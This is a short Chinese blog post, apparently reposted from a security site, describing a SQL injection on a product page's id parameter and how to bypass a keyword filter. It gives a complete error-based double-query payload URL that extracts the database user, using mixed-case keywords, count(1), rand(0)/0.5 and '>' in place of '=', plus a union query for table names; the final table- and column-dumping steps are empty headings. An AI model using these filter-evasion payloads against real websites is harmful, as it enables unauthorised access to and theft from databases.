目标站用 HdhCmsTestcnseay测试数据代替。
打开网站,点开一个产品页面。在 ?id=62 后面加单引号,如下图
判断出参数id无单引号保护,且GPC开启,无单引号就好办多了。
不过经测试,发现以下问题:
1、 常用注入关键字union、select、from、星号(*)、等号等均被替换为空。
2、 参数被多条SQL语句使用,只能用第一条语句双查询报错注入。
OK,知道了限制,我们就可以想绕过方法来玩了。
通过测试发现。union、select、from 等关键字可大小写绕过。
OK,接下来就要用双查询就可以得到数据了。比较常用的双查询语句:
(select 1 from (select count(*),concat(floor(rand(0)*2),(select user() ))a from information_schema.tables group by a)b)
可以看到有星号,星号是会被替换为空的,那就办法不用星号吧。
第一个星号处: count(*) 我把它换成 count( 1 ) 。
第二个星号处: floor(rand(0)*2) 怎么搞呢?
其实很简单,1*2=??? 等于2吧,那乘法换成除法呢?
那就是1/0.5 还是等于2。
那等号呢??
我们可以用大于或者小于绕过。
所以最终的语句为:
http://HdhCmsTest 2cto测试数据 /show_content.php?id=62 anD cate_parent>(selecT 1 fRom (selecT count(1),concat(floor(rand(0)/0.5),(select USER()))a frOm information_schema.tables gRoup by a)b)– 1
那查其他表数据呢?
union select 1,2,..,group_concat(table_name) from information_schema.tables where table_schema =database()
这里有等号啊。怎么绕???????
可以用in()查询。
爆表名:
爆列名:
查看更多关于记一次绕过简单SQL防注入爆菊 - 网站安全 - 自学的详细内容...